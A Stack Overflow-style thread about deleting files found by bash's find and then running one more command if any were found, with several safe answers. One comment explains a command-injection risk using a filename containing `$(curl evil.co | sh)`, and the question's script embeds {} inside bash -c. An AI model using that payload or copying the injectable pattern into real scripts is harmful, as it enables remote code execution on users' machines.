# With BASH, 'find' matching files, delete them all, then if one or more was found, do ONE more thing

Tags: bash, find

I want to periodically search for the existence of all files on my system matching a specific name, delete them, and then afterwards if any were found at all, run an additional command.

```
test=1
find /home/ -name 'file_name_to_find' -exec bash -c "rm \"{}\" && test=2" \;
echo $test
if [[${test} == '2']] ; then
    echo "it worked!"
fi
```

I think because the variable scope in the exec is new, the value of $test is inaccessible to the rest of the script.

How can I achieve the desired result?

Comment: Child processes can't set variables visible by parent processes.

Comment: Note: Logic aside, you have some syntax errors and security issues in your current script. [Shellcheck](https://www.shellcheck.net/) will highlight them.

Comment: See the [Actions in Bulk section of _Using Find_](https://mywiki.wooledge.org/UsingFind#Actions_in_bulk:_xargs.2C_-print0_and_-exec_.2B-) -- the sanest thing to do here is to pipe a NUL-delimited stream of filenames from find into your parent bash process and do both the `rm`s and the logic there.

Comment: Variables assigned in the `bash -c` subshell won't be visible on the original shell.

Comment: ...search for the string `< <(` in that page for a particular on-point example combining the practices from [BashFAQ #1](https://mywiki.wooledge.org/BashFAQ/001) and [BashFAQ #24](https://mywiki.wooledge.org/BashFAQ/024) (the latter covers the same space as [a variable modified inside a while loop is not remembered](https://stackoverflow.com/questions/16854280) or [shell variable gets modified in while loop but not `find | while` loop](https://stackoverflow.com/questions/32121286))

Comment: (Also, `find ... -exec bash -c '...{}...'` is _always_ a major security risk; don't ever use `{}` inside a `-c` argument. Consider the case where the filename you're searching for is in a directory named `$(curl evil.co | sh)'$(curl evil.co|sh)'` -- you don't want a rootkit installed on your box; even if you switched from double quotes to single quotes inside the sh -c argument you'd still be vulnerable on account of the literal quotes inside the name counteracting them).

Comment: (...the safe alternative is to make your `sh -c` script argument constant, but then pass `find`'s results on the argument list _after_ that script and have the script refer to its arguments via `"$@"`, `"$1"`, or similar)

Answer (score 5, accepted):

You can `-delete` the file and then `-print` it. If anything will be printed, it was deleted, so just check if it's not empty.

```
removed=$(find /home/ -name 'file_name_to_find' -delete -print)
if [[ -n "$removed" ]]; then
    echo "Some files were removed"
fi
```

Answer (score 2):

If you are using Bash 4.3 or later, try this [Shellcheck](https://www.shellcheck.net/)-clean code:

```
#! /bin/bash -p

shopt -s dotglob globstar nullglob
is_found=0
for f in /home/**/'file_name_to_find'; do
    rm -- "$f"
    is_found=1
done
(( is_found )) && echo 'it worked'
```

- `shopt -s ...` enables some Bash settings that are required by the code:

  - `dotglob` enables globs to match files and directories that begin with `.`.  `find` processes such files by default.
  - `globstar` enables the use of `**` to match paths recursively through directory trees.  This option was introduced with Bash 4.0 (released in 2009) but it is dangerous to use in versions before 4.3 (released in 2014) because it follows symlinks.
  - `nullglob` makes globs expand to nothing when nothing matches (otherwise they expand to the glob pattern itself, which is almost never useful in programs).

Comment: Do not set option in the shebag as it will be ignored if script is directly started as an argument of a bash command. Instead of that, remove the `-p` from the shebang, and use `set -o privileged` instead in the code, so it will be executed regardless of the way the script is invoked.

Comment: @LéaGris, the `-p` option is mostly useless if it is used after the shebang because one of its main purposes is to prevent Bash executing code in startup files before it runs the code in the program.

Answer (score 1):

Since you are using Bash, you could efficiently buffer found files into an array and process the array for deletion and further action:

```bash
#!/usr/bin/env bash

# Capture null-delimited found files into array
mapfile -d '' -t todDelete < <(
  # Find print null-delimited list of found files
  find /home/ -name 'file_name_to_find' -print0
)

# If array contains entries
if [ ${#todDelete[@]} -gt 0 ]
then
  # Deletes each file (remove echo once results is what you expect)
  echo rm -f -- "${todDelete[@]}"

  : Perform some other tasks for when files where deleted
fi
```